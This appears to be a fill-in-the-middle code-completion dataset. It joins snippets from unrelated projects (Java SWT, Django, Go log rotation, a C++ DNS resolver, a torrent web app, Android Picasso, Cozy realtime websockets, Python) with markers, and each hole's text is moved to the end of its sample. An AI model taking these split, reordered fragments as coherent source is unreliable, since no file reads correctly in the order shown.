explicit.add(other);
}
}
Collections.sort(explicit, new Comparator<ModelExplicitCriterion>(){
public int compare(ModelExplicitCriterion o1, ModelExplicitCriterion o2) {
return o1.getAttribute().compareTo(o2.getAttribute());
}
});
for (ModelExplicitCriterion c :explicit) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", c.toString(), c.getAttribute() }); //$NON-NLS-1$
if (c instanceof ModelLDiversityCriterion) {
item.setImage(0, symbolL);
} else if (c instanceof ModelTClosenessCriterion) {
item.setImage(0, symbolT);
} else if (c instanceof ModelDDisclosurePrivacyCriterion) {
item.setImage(0, symbolD);
} else if (c instanceof ModelBLikenessCriterion) {
item.setImage(0, symbolB);
}
item.setData(c);
}
List<ModelRiskBasedCriterion> riskBased = new ArrayList<ModelRiskBasedCriterion>();
for (ModelRiskBasedCriterion other : model.getRiskBasedModel()) {
if (other.isEnabled()) {
riskBased.add(other);
}
}
Collections.sort(riskBased, new Comparator<ModelRiskBasedCriterion>(){
public int compare(ModelRiskBasedCriterion o1, ModelRiskBasedCriterion o2) {
return o1.getLabel().compareTo(o2.getLabel());
}
});
for (ModelRiskBasedCriterion c : riskBased) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", c.toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolR);
item.setData(c);
}
// Update
layout.updateButtons();
root.setRedraw(true);
SWTUtil.enable(root);
table.redraw();
}
}<|fim▁end|> | this.controller.addListener(ModelPart.ATTRIBUTE_TYPE_BULK_UPDATE, this);
|
<|file_name|>corpus.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (C) 2010 Samalyse SARL
# Copyright (C) 2010-2014 Parisson SARL
# This file is part of Telemeta.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Olivier Guilyardi <[email protected]>
# David LIPSZYC <[email protected]>
# Guillaume Pellerin <[email protected]>
from __future__ import division
from django.utils.translation import ugettext_lazy as _
from telemeta.models.core import *
from telemeta.models.resource import *
from telemeta.models.collection import *
class MediaCorpus(MediaBaseResource):
"Describe a corpus"
element_type = 'corpus'
children_type = 'collections'
children = models.ManyToManyField(MediaCollection, related_name="corpus",
verbose_name=_('collections'), blank=True)
recorded_from_year = IntegerField(_('recording year (from)'), help_text=_('YYYY'))
recorded_to_year = IntegerField(_('recording year (until)'), help_text=_('YYYY'))
objects = MediaCorpusManager()
permissions = (("can_download_corpus_epub", "Can download corpus EPUB"),)
@property
def public_id(self):
return self.code
@property
def has_mediafile(self):
for child in self.children.all():
if child.has_mediafile:
return True
return False
def computed_duration(self):
duration = Duration()
for child in self.children.all():
duration += child.computed_duration()
return duration
computed_duration.verbose_name = _('total available duration')
class Meta(MetaCore):
db_table = 'media_corpus'
verbose_name = _('corpus')
verbose_name_plural = _('corpus')
ordering = ['code']
class MediaCorpusRelated(MediaRelated):
"Corpus related media"
resource = ForeignKey(MediaCorpus, related_name="related", verbose_name=_('corpus'))
class Meta(MetaCore):
db_table = 'media_corpus_related'
verbose_name = _('corpus related media')<|fim▁hole|><|fim▁end|> | verbose_name_plural = _('corpus related media') |
<|file_name|>glogrotate.go<|end_file_name|><|fim▁begin|>/*
Gzips and deletes log files generated by glog http://github.com/golang/glog
Basic usage:
glogrotate -base=/var/log -maxage=240h myapp myotherapp
glogrotate will not touch the current log files. There are different timeouts for the INFO, WARNING, and ERROR log levels.
*/
package main
import (
"flag"
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
"time"
)
const (
defaultDeleteInfoAfter = 30 * 24 * time.Hour
defaultWarnMult = 2
defaultErrorMult = 3
)
var (
base = flag.String("base", "/var/log/", "log subdir")
deleteInfoAfter = flag.Duration("maxage", defaultDeleteInfoAfter, "delete INFO files older than this")
warnMult = flag.Int("warn", defaultWarnMult, "multiplier relative to maxage for WARNING files")
errorMult = flag.Int("error", defaultErrorMult, "multiplier relative to maxage for ERROR/FATAL files")
verbose = flag.Bool("v", false, "verbose")
)
func main() {
flag.Parse()
for _, log := range flag.Args() {
clean(*base+"/"+log, log)
}
}
func clean(dir, name string) {
if *verbose {
fmt.Printf("clean %s/%s*...\n", dir, name)
}
fs, err := filepath.Glob(dir + "/" + name + "*")
if err != nil {
fatalf("file error: %s", err)
}
doNotTouch := map[string]struct{}{}
var candidates []string
for _, f := range fs {
if t, err := os.Readlink(f); err == nil {
// it's a symlink to the current file.
a := filepath.Join(filepath.Dir(f), t)
doNotTouch[a] = struct{}{}
continue
}
candidates = append(candidates, f)
}
for _, f := range candidates {
if _, ok := doNotTouch[f]; ok {
if *verbose {
fmt.Printf("don't touch: %s\n", f)
}
continue
}
// we want the date from 'one.rz-reqmngt1-eu.root.log.ERROR.20150320-103857.29198'
// (might have a .gz suffix)
fields := strings.Split(f, ".")
if len(fields) < 3 {
fatalf("unexpected filename: %q", f)
}
if fields[len(fields)-1] == `gz` {
fields = fields[:len(fields)-1]
}
var dAfter time.Duration
level := fields[len(fields)-3]
switch level {
case "INFO":
dAfter = *deleteInfoAfter
case "WARNING":
dAfter = time.Duration(*warnMult) * (*deleteInfoAfter)
case "ERROR", "FATAL":
dAfter = time.Duration(*errorMult) * (*deleteInfoAfter)
default:
fatalf("weird log level: %q", level)
}
d, err := time.Parse("20060102", strings.SplitN(fields[len(fields)-2], "-", 2)[0])
if err != nil {
fatalf("invalid date: %s", err)
}
if d.Before(time.Now().Add(-dAfter)) {
if *verbose {
fmt.Printf("delete %s\n", f)
}
os.Remove(f)
continue
}
if !strings.HasSuffix(f, ".gz") {
if *verbose {<|fim▁hole|> }
}
}
}
func fatalf(f string, args ...interface{}) {
fmt.Fprintf(os.Stderr, f, args)
fmt.Fprint(os.Stderr, "\n")
os.Exit(1)
}<|fim▁end|> | fmt.Printf("gzipping %s...\n", f)
}
if err := exec.Command("gzip", f).Run(); err != nil {
fatalf("gzip: %s", err) |
<|file_name|>dns.cc<|end_file_name|><|fim▁begin|>/**
* $Id$
* Copyright (C) 2008 - 2014 Nils Asmussen
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
#include <esc/proto/socket.h>
#include <esc/stream/fstream.h>
#include <esc/stream/istringstream.h>
#include <esc/stream/ostream.h>
#include <esc/dns.h>
#include <sys/common.h>
#include <sys/endian.h>
#include <sys/proc.h>
#include <sys/thread.h>
#include <signal.h>
namespace esc {
/* based on http://tools.ietf.org/html/rfc1035 */
#define DNS_RECURSION_DESIRED 0x100
#define DNS_PORT 53
#define BUF_SIZE 512
uint16_t DNS::_nextId = 0;
esc::Net::IPv4Addr DNS::_nameserver;
enum Type {
TYPE_A = 1, /* a host address */
TYPE_NS = 2, /* an authoritative name server */
TYPE_CNAME = 5, /* the canonical name for an alias */
TYPE_HINFO = 13, /* host information */
TYPE_MX = 15, /* mail exchange */
};
enum Class {
CLASS_IN = 1 /* the Internet */
};
struct DNSHeader {
uint16_t id;
uint16_t flags;
uint16_t qdCount;
uint16_t anCount;
uint16_t nsCount;
uint16_t arCount;
} A_PACKED;
struct DNSQuestionEnd {
uint16_t type;
uint16_t cls;
} A_PACKED;
struct DNSAnswer {
uint16_t name;
uint16_t type;
uint16_t cls;
uint32_t ttl;
uint16_t length;
} A_PACKED;
esc::Net::IPv4Addr DNS::getHost(const char *name,uint timeout) {
if(isIPAddress(name)) {
esc::Net::IPv4Addr addr;
IStringStream is(name);
is >> addr;
return addr;
}
return resolve(name,timeout);
}
bool DNS::isIPAddress(const char *name) {
int dots = 0;
int len = 0;
// ignore whitespace at the beginning
while(isspace(*name))
name++;
while(dots < 4 && len < 4 && *name) {
if(*name == '.') {
dots++;
len = 0;
}
else if(isdigit(*name))
len++;
else
break;
name++;
}
// ignore whitespace at the end
while(isspace(*name))
name++;
return dots == 3 && len > 0 && len < 4;
}
esc::Net::IPv4Addr DNS::resolve(const char *name,uint timeout) {
uint8_t buffer[BUF_SIZE];
if(_nameserver.value() == 0) {
FStream in(getResolveFile(),"r");
in >> _nameserver;
if(_nameserver.value() == 0)
VTHROWE("No nameserver",-EHOSTNOTFOUND);
}
size_t nameLen = strlen(name);
size_t total = sizeof(DNSHeader) + nameLen + 2 + sizeof(DNSQuestionEnd);<|fim▁hole|> if(total > sizeof(buffer))
VTHROWE("Hostname too long",-EINVAL);
// generate a unique
uint16_t txid = (getpid() << 16) | _nextId;
// build DNS request message
DNSHeader *h = reinterpret_cast<DNSHeader*>(buffer);
h->id = cputobe16(txid);
h->flags = cputobe16(DNS_RECURSION_DESIRED);
h->qdCount = cputobe16(1);
h->anCount = 0;
h->nsCount = 0;
h->arCount = 0;
convertHostname(reinterpret_cast<char*>(h + 1),name,nameLen);
DNSQuestionEnd *qend = reinterpret_cast<DNSQuestionEnd*>(buffer + sizeof(*h) + nameLen + 2);
qend->type = cputobe16(TYPE_A);
qend->cls = cputobe16(CLASS_IN);
// create socket
esc::Socket sock(esc::Socket::SOCK_DGRAM,esc::Socket::PROTO_UDP);
// send over socket
esc::Socket::Addr addr;
addr.family = esc::Socket::AF_INET;
addr.d.ipv4.addr = _nameserver.value();
addr.d.ipv4.port = DNS_PORT;
sock.sendto(addr,buffer,total);
sighandler_t oldhandler;
if((oldhandler = signal(SIGALRM,sigalarm)) == SIG_ERR)
VTHROW("Unable to set SIGALRM handler");
int res;
if((res = ualarm(timeout * 1000)) < 0)
VTHROWE("ualarm(" << (timeout * 1000) << ")",res);
try {
// receive response
sock.recvfrom(addr,buffer,sizeof(buffer));
}
catch(const esc::default_error &e) {
if(e.error() == -EINTR)
VTHROWE("Received no response from DNS server " << _nameserver,-ETIMEOUT);
// ignore errors here
if(signal(SIGALRM,oldhandler) == SIG_ERR) {}
throw;
}
// ignore errors here
if(signal(SIGALRM,oldhandler) == SIG_ERR) {}
if(be16tocpu(h->id) != txid)
VTHROWE("Received DNS response with wrong transaction id",-EHOSTNOTFOUND);
int questions = be16tocpu(h->qdCount);
int answers = be16tocpu(h->anCount);
// skip questions
uint8_t *data = reinterpret_cast<uint8_t*>(h + 1);
for(int i = 0; i < questions; ++i) {
size_t len = questionLength(data);
data += len + sizeof(DNSQuestionEnd);
}
// parse answers
for(int i = 0; i < answers; ++i) {
DNSAnswer *ans = reinterpret_cast<DNSAnswer*>(data);
if(be16tocpu(ans->type) == TYPE_A && be16tocpu(ans->length) == esc::Net::IPv4Addr::LEN)
return esc::Net::IPv4Addr(data + sizeof(DNSAnswer));
}
VTHROWE("Unable to find IP address in DNS response",-EHOSTNOTFOUND);
}
void DNS::convertHostname(char *dst,const char *src,size_t len) {
// leave one byte space for the length of the first part
const char *from = src + len++;
char *to = dst + len;
// we start with the \0 at the end
int partLen = -1;
for(size_t i = 0; i < len; i++, to--, from--) {
if(*from == '.') {
*to = partLen;
partLen = 0;
}
else {
*to = *from;
partLen++;
}
}
*to = partLen;
}
size_t DNS::questionLength(const uint8_t *data) {
size_t total = 0;
while(*data != 0) {
uint8_t len = *data;
// skip this name-part
total += len + 1;
data += len + 1;
}
// skip zero ending, too
return total + 1;
}
}<|fim▁end|> | |
<|file_name|>main.py<|end_file_name|><|fim▁begin|>import logging
from src.settings import JINJA_ENVIRONMENT
from src.base import BaseHandler
from src.main.models import Torrent, UserTorrent
from google.appengine.ext import ndb
from google.appengine.api import users
import arrow
from time import sleep
class IndexPage(BaseHandler):
def get(self):
# new movies
self.template_values['movies'] = Torrent.query(Torrent.category_code == 207, Torrent.uploader == 'YIFY', Torrent.resolution == 720).order(-Torrent.uploaded_at).fetch(30)
# new series
self.template_values['series_new'] = Torrent.query(Torrent.category_code == 205, Torrent.series_episode == 1).order(-Torrent.uploaded_at).fetch(15)
episodes_new = []
series_watching = []
# watching series
uts = UserTorrent.query(UserTorrent.user == users.get_current_user(), UserTorrent.category_code == 205).fetch()
if uts:
series_watching = set()
for ut in [ut for ut in uts if ut.torrent.get().series_title]:
series_watching.add(ut.torrent.get().series_title)
logging.info('{0} series being watched by user'.format(len(uts)))
<|fim▁hole|> episodes_new = Torrent.query(Torrent.series_title.IN(series_watching), Torrent.uploaded_at > cutoff, Torrent.category_code == 205).order(-Torrent.uploaded_at).fetch()
logging.info('{0} episodes fetched for watched series'.format(len(episodes_new)))
self.template_values['series_watching'] = series_watching
self.template_values['episodes_new'] = episodes_new
# logging.info('{0}'.format(self.template_values))
template = JINJA_ENVIRONMENT.get_template('main/templates/index.html')
self.response.write(template.render(self.template_values))
class CategoryPage(BaseHandler):
def get(self, cat):
logging.info('cat {0}'.format(cat))
self.template_values['cat'] = int(cat)
# get torrents
torrents = Torrent.query(Torrent.category_code == int(cat)).order(-Torrent.uploaded_at).fetch()
self.template_values['torrents'] = torrents
logging.info('torrents {0}'.format(len(torrents)))
template = JINJA_ENVIRONMENT.get_template('main/templates/category.html')
self.response.write(template.render(self.template_values))
class DownloadPage(BaseHandler):
def get(self, key):
logging.info('download {0}'.format(key))
logging.info('user {0}'.format(self.user))
torrent = ndb.Key(urlsafe=key).get()
logging.info('torrent {0}'.format(torrent))
ut = UserTorrent.query(UserTorrent.user == self.user, UserTorrent.torrent == torrent.key).get()
if not ut:
ut = UserTorrent(user=self.user, torrent=torrent.key, category_code=torrent.category_code)
ut.put()
logging.info('User Torrent saved')
else:
ut.key.delete()
logging.info('User Torrent deleted')
logging.info('User Torrent {0}'.format(ut))
self.response.status = '200 OK'<|fim▁end|> | # new episodes
if series_watching:
cutoff = arrow.utcnow().replace(days=-14).datetime |
<|file_name|>PicassoExecutorService.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2013 Square, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hyh.common.picasso;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.telephony.TelephonyManager;
import java.util.concurrent.Future;
import java.util.concurrent.FutureTask;
import java.util.concurrent.PriorityBlockingQueue;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;
/**
* The default {@link java.util.concurrent.ExecutorService} used for new {@link NativePicasso} instances.
* <p>
* Exists as a custom type so that we can differentiate the use of defaults versus a user-supplied
* instance.
*/
class PicassoExecutorService extends ThreadPoolExecutor {
private static final int DEFAULT_THREAD_COUNT = 3;
PicassoExecutorService() {
super(DEFAULT_THREAD_COUNT, DEFAULT_THREAD_COUNT, 0, TimeUnit.MILLISECONDS,
new PriorityBlockingQueue<Runnable>(), new Utils.PicassoThreadFactory());
}
void adjustThreadCount(NetworkInfo info) {
if (info == null || !info.isConnectedOrConnecting()) {
setThreadCount(DEFAULT_THREAD_COUNT);
return;
}
switch (info.getType()) {
case ConnectivityManager.TYPE_WIFI:
case ConnectivityManager.TYPE_WIMAX:
case ConnectivityManager.TYPE_ETHERNET:
setThreadCount(4);
break;
case ConnectivityManager.TYPE_MOBILE:
switch (info.getSubtype()) {
case TelephonyManager.NETWORK_TYPE_LTE: // 4G
case TelephonyManager.NETWORK_TYPE_HSPAP:
case TelephonyManager.NETWORK_TYPE_EHRPD:
setThreadCount(3);
break;
case TelephonyManager.NETWORK_TYPE_UMTS: // 3G
case TelephonyManager.NETWORK_TYPE_CDMA:
case TelephonyManager.NETWORK_TYPE_EVDO_0:
case TelephonyManager.NETWORK_TYPE_EVDO_A:
case TelephonyManager.NETWORK_TYPE_EVDO_B:
setThreadCount(2);
break;
case TelephonyManager.NETWORK_TYPE_GPRS: // 2G
case TelephonyManager.NETWORK_TYPE_EDGE:
setThreadCount(1);
break;
default:
setThreadCount(DEFAULT_THREAD_COUNT);
}
break;
default:
setThreadCount(DEFAULT_THREAD_COUNT);
}
}
private void setThreadCount(int threadCount) {
setCorePoolSize(threadCount);
setMaximumPoolSize(threadCount);
}
@Override
public Future<?> submit(Runnable task) {
PicassoFutureTask ftask = new PicassoFutureTask((BitmapHunter) task);
execute(ftask);
return ftask;
}
private static final class PicassoFutureTask extends FutureTask<BitmapHunter>
implements Comparable<PicassoFutureTask> {
private final BitmapHunter hunter;
public PicassoFutureTask(BitmapHunter hunter) {
super(hunter, null);
this.hunter = hunter;
}
@Override
public int compareTo(PicassoFutureTask other) {
NativePicasso.Priority p1 = hunter.getPriority();
NativePicasso.Priority p2 = other.hunter.getPriority();
// High-priority requests are "lesser" so they are sorted to the front.
// Equal priorities are sorted by sequence number to provide FIFO ordering.
return (p1 == p2 ? hunter.sequence - other.hunter.sequence : p2.ordinal() - p1.ordinal());<|fim▁hole|> }
}
}<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)<|fim▁hole|>from . import stock
from . import wizard
from . import product_price_history
from . import account_anglo_saxon_pos
from . import purchase<|fim▁end|> | # Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
from . import product |
<|file_name|>bridge_name_generator_test.go<|end_file_name|><|fim▁begin|>package bridgemgr_test
import (
"code.cloudfoundry.org/garden-linux/network/bridgemgr"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("Bridge Name Generator", func() {
var (
generator bridgemgr.BridgeNameGenerator
)
BeforeEach(func() {
generator = bridgemgr.NewBridgeNameGenerator("pr-")
})
It("returns unique names each time it is called", func() {
generatedNames := make(map[string]bool)
for i := 0; i < 100; i++ {
name := generator.Generate()
generatedNames[name] = true
}
Expect(generatedNames).To(HaveLen(100))
})
<|fim▁hole|> name := generator.Generate()
Expect(name).To(HavePrefix("pr-"))
})
It("returns names that are exactly 15 characters", func() {
name := generator.Generate()
Expect(name).To(HaveLen(15))
name = bridgemgr.NewBridgeNameGenerator("p").Generate()
Expect(name).To(HaveLen(15))
})
})<|fim▁end|> | It("includes the entire prefix as part of the name", func() { |
<|file_name|>main.js<|end_file_name|><|fim▁begin|>'use strict';
describe('Controller: MainCtrl', function () {
// load the controller's module
beforeEach(module('pillzApp'));
var MainCtrl,
scope,<|fim▁hole|>
// Initialize the controller and a mock scope
beforeEach(inject(function (_$httpBackend_, $controller, $rootScope) {
$httpBackend = _$httpBackend_;
$httpBackend.expectGET('/api/awesomeThings')
.respond(['HTML5 Boilerplate', 'AngularJS', 'Karma', 'Express']);
scope = $rootScope.$new();
MainCtrl = $controller('MainCtrl', {
$scope: scope
});
}));
it('should attach a list of awesomeThings to the scope', function () {
expect(scope.awesomeThings).toBeUndefined();
$httpBackend.flush();
expect(scope.awesomeThings.length).toBe(4);
});
});<|fim▁end|> | $httpBackend; |
<|file_name|>realtime.go<|end_file_name|><|fim▁begin|>package realtime
import (
"context"
"fmt"
"net/http"
"strings"
"time"
"github.com/cozy/cozy-stack/model/instance"
"github.com/cozy/cozy-stack/model/permission"
"github.com/cozy/cozy-stack/model/vfs"
"github.com/cozy/cozy-stack/pkg/consts"
"github.com/cozy/cozy-stack/pkg/couchdb"
"github.com/cozy/cozy-stack/pkg/jsonapi"
"github.com/cozy/cozy-stack/pkg/logger"
"github.com/cozy/cozy-stack/pkg/prefixer"
"github.com/cozy/cozy-stack/pkg/realtime"
"github.com/cozy/cozy-stack/web/middlewares"
"github.com/gorilla/websocket"
"github.com/labstack/echo/v4"
)
const (
// Time allowed to write a message to the peer
writeWait = 10 * time.Second
// Time allowed to read the next pong message from the peer
pongWait = 60 * time.Second
// Send pings to peer with this period (must be less than pongWait)
pingPeriod = (pongWait * 9) / 10
// Maximum message size allowed from peer
maxMessageSize = 1024
)
var upgrader = websocket.Upgrader{
// Don't check the origin of the connexion, we check authorization later
CheckOrigin: func(r *http.Request) bool { return true },
Subprotocols: []string{"io.cozy.websocket"},
ReadBufferSize: 1024,
WriteBufferSize: 1024,
}
type command struct {
Method string `json:"method"`
Payload struct {
Type string `json:"type"`
ID string `json:"id"`
} `json:"payload"`
}
type wsResponsePayload struct {
Type string `json:"type"`
ID string `json:"id"`
Doc interface{} `json:"doc,omitempty"`
}
type wsResponse struct {
Event string `json:"event"`
Payload wsResponsePayload `json:"payload"`
}
type wsErrorPayload struct {
Status string `json:"status"`
Code string `json:"code"`
Title string `json:"title"`
Source interface{} `json:"source"`
}
type wsError struct {
Event string `json:"event"`
Payload wsErrorPayload `json:"payload"`
}
func unauthorized(cmd interface{}) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "401 Unauthorized",
Code: "unauthorized",
Title: "The authentication has failed",
Source: cmd,
},
}
}
func forbidden(cmd *command) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "403 Forbidden",
Code: "forbidden",
Title: fmt.Sprintf("The application can't subscribe to %s", cmd.Payload.Type),
Source: cmd,
},
}
}
func unknownMethod(method string, cmd interface{}) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "405 Method Not Allowed",
Code: "method not allowed",
Title: fmt.Sprintf("The %s method is not supported", method),
Source: cmd,
},
}
}
func missingType(cmd *command) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "404 Page Not Found",
Code: "page not found",
Title: "The type parameter is mandatory for SUBSCRIBE",
Source: cmd,
},
}
}
func sendErr(ctx context.Context, errc chan *wsError, e *wsError) {
select {
case errc <- e:
case <-ctx.Done():
}
}
func authorized(i *instance.Instance, perms permission.Set, permType, id string) bool {
if perms.AllowWholeType(permission.GET, permType) {
return true
} else if id == "" {
return false
} else if permType == consts.Files {
fs := i.VFS()
dir, file, err := fs.DirOrFileByID(id)
if dir != nil {
err = vfs.Allows(fs, perms, permission.GET, dir)
} else if file != nil {
err = vfs.Allows(fs, perms, permission.GET, file)
}
return err == nil
} else {
return perms.AllowID(permission.GET, permType, id)
}
}
func readPump(ctx context.Context, c echo.Context, i *instance.Instance, ws *websocket.Conn,
ds *realtime.DynamicSubscriber, errc chan *wsError, withAuthentication bool) {
defer close(errc)
var err error
var pdoc *permission.Permission
if withAuthentication {
var auth map[string]string
if err = ws.ReadJSON(&auth); err != nil {
sendErr(ctx, errc, unknownMethod(auth["method"], auth))
return
}
if strings.ToUpper(auth["method"]) != "AUTH" {
sendErr(ctx, errc, unknownMethod(auth["method"], auth))
return
}
if auth["payload"] == "" {
sendErr(ctx, errc, unauthorized(auth))
return
}
pdoc, err = middlewares.ParseJWT(c, i, auth["payload"])
if err != nil {
sendErr(ctx, errc, unauthorized(auth))
return
}
}
for {
cmd := &command{}
if err = ws.ReadJSON(cmd); err != nil {
if websocket.IsUnexpectedCloseError(err, websocket.CloseGoingAway, websocket.CloseNoStatusReceived) {
logger.
WithDomain(ds.DomainName()).
WithField("nspace", "realtime").
Debugf("Error: %s", err)
}
break
}
method := strings.ToUpper(cmd.Method)
if method != "SUBSCRIBE" && method != "UNSUBSCRIBE" {
sendErr(ctx, errc, unknownMethod(cmd.Method, cmd))
continue
}
if cmd.Payload.Type == "" {
sendErr(ctx, errc, missingType(cmd))<|fim▁hole|> continue
}
permType := cmd.Payload.Type
// XXX: thumbnails is a synthetic doctype, listening to its events
// requires a permissions on io.cozy.files. Same for note events.
if permType == consts.Thumbnails || permType == consts.NotesEvents {
permType = consts.Files
}
// XXX: no permissions are required for io.cozy.sharings.initial_sync
// and io.cozy.auth.confirmations
if withAuthentication &&
cmd.Payload.Type != consts.SharingsInitialSync &&
cmd.Payload.Type != consts.AuthConfirmations {
if !authorized(i, pdoc.Permissions, permType, cmd.Payload.ID) {
sendErr(ctx, errc, forbidden(cmd))
continue
}
}
if method == "SUBSCRIBE" {
if cmd.Payload.ID == "" {
err = ds.Subscribe(cmd.Payload.Type)
} else {
err = ds.Watch(cmd.Payload.Type, cmd.Payload.ID)
}
} else if method == "UNSUBSCRIBE" {
if cmd.Payload.ID == "" {
err = ds.Unsubscribe(cmd.Payload.Type)
} else {
err = ds.Unwatch(cmd.Payload.Type, cmd.Payload.ID)
}
}
if err != nil {
logger.
WithDomain(ds.DomainName()).
WithField("nspace", "realtime").
Warnf("Error: %s", err)
}
}
}
// Ws is the API handler for realtime via a websocket connection.
func Ws(c echo.Context) error {
var db prefixer.Prefixer
// The realtime webservice can be plugged in a context without instance
// fetching. For instance in the administration server. In such case, we do
// not need authentication
inst, withAuthentication := middlewares.GetInstanceSafe(c)
if !withAuthentication {
db = prefixer.GlobalPrefixer
} else {
db = inst
}
ws, err := upgrader.Upgrade(c.Response(), c.Request(), nil)
if err != nil {
return err
}
defer ws.Close()
ws.SetReadLimit(maxMessageSize)
if err = ws.SetReadDeadline(time.Now().Add(pongWait)); err != nil {
return nil
}
ws.SetPongHandler(func(string) error {
return ws.SetReadDeadline(time.Now().Add(pongWait))
})
ds := realtime.GetHub().Subscriber(db)
defer ds.Close()
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
errc := make(chan *wsError)
go readPump(ctx, c, inst, ws, ds, errc, withAuthentication)
ticker := time.NewTicker(pingPeriod)
defer ticker.Stop()
for {
select {
case e, ok := <-errc:
if !ok { // Websocket has been closed by the client
return nil
}
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return nil
}
if err := ws.WriteJSON(e); err != nil {
return nil
}
case e := <-ds.Channel:
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return err
}
res := wsResponse{
Event: e.Verb,
Payload: wsResponsePayload{
Type: e.Doc.DocType(),
ID: e.Doc.ID(),
Doc: e.Doc,
},
}
if err := ws.WriteJSON(res); err != nil {
return nil
}
case <-ticker.C:
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return err
}
if err := ws.WriteMessage(websocket.PingMessage, []byte{}); err != nil {
return nil
}
}
}
}
// Notify is the API handler for POST /realtime/:doctype/:id: this route can be
// used to send documents in the real-time without having to persist them in
// CouchDB.
func Notify(c echo.Context) error {
inst := middlewares.GetInstance(c)
doctype := c.Param("doctype")
id := c.Param("id")
if err := permission.CheckReadable(doctype); err != nil {
return jsonapi.BadRequest(err)
}
var payload couchdb.JSONDoc
if err := c.Bind(&payload); err != nil {
return jsonapi.BadRequest(err)
}
payload.SetID(id)
payload.Type = doctype
if err := middlewares.Allow(c, permission.POST, &payload); err != nil {
return err
}
realtime.GetHub().Publish(inst, realtime.EventNotify, &payload, nil)
return c.NoContent(http.StatusNoContent)
}
// Routes set the routing for the realtime service
func Routes(router *echo.Group) {
router.GET("/", Ws)
router.POST("/:doctype/:id", Notify)
}<|fim▁end|> | |
<|file_name|>app.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import imp
import os
import sys
PYCART_DIR = ''.join(['python-', '.'.join(map(str, sys.version_info[:2]))])
try:
zvirtenv = os.path.join(os.environ['OPENSHIFT_HOMEDIR'], PYCART_DIR,
'virtenv', 'bin', 'activate_this.py')
execfile(zvirtenv, dict(__file__ = zvirtenv) )
except IOError:
pass
def run_gevent_server(app, ip, port=8181):
from gevent.pywsgi import WSGIServer
WSGIServer((ip, port), app).serve_forever()
def run_simple_httpd_server(app, ip, port=8181):
from wsgiref.simple_server import make_server
make_server(ip, port, app).serve_forever()
#
# IMPORTANT: Put any additional includes below this line. If placed above this
# line, it's possible required libraries won't be in your searchable path
#
#
# main():
#
if __name__ == '__main__':<|fim▁hole|> # Use gevent if we have it, otherwise run a simple httpd server.
print 'Starting WSGIServer on %s:%d ... ' % (ip, port)
try:
run_gevent_server(zapp.application, ip, port)
except:
print 'gevent probably not installed - using default simple server ...'
run_simple_httpd_server(zapp.application, ip, port)<|fim▁end|> | ip = os.environ['OPENSHIFT_PYTHON_IP']
port = 8181
zapp = imp.load_source('application', 'wsgi/application')
|
<|file_name|>read_and_enrich.py<|end_file_name|><|fim▁begin|>import os
from HTMLParser import HTMLParser
from ConfigParser import NoOptionError
import nltk
from sentence import Sentence
from resources import Resources
from wordnet_cache import WordnetCache as Wordnet
class ReadAndEnrich(object):
def __init__(self, conf):
self.conf = conf
self.enricher = Enricher(conf)
self.pairs = []
def read_sentences(self, stream):
for sen1, sen2, tags1, tags2 in self.read_lines(stream):
s1 = self.enricher.add_sentence(sen1, tags1)
s2 = self.enricher.add_sentence(sen2, tags2)
self.pairs.append((s1, s2))
return self.pairs
def clear_pairs(self):
self.pairs = []
def read_lines(self, stream):
enc = self.conf.get('global', 'encoding')
for l in stream:
fs = l.decode(enc).strip().split('\t')
if len(fs) == 2:
sen1 = fs[0]
sen2 = fs[1]
yield sen1, sen2, None, None
elif len(fs) == 6:
sen1 = fs[2]
sen2 = fs[3]
tags1 = fs[4]
tags2 = fs[5]
yield sen1, sen2, tags1, tags2
elif len(fs) == 7:
sen1 = fs[2]
sen2 = fs[3]
tags1 = fs[5]
tags2 = fs[6]
yield sen1, sen2, tags1, tags2
class Enricher(object):
def __init__(self, conf):
self.conf = conf
self.sentences = {}
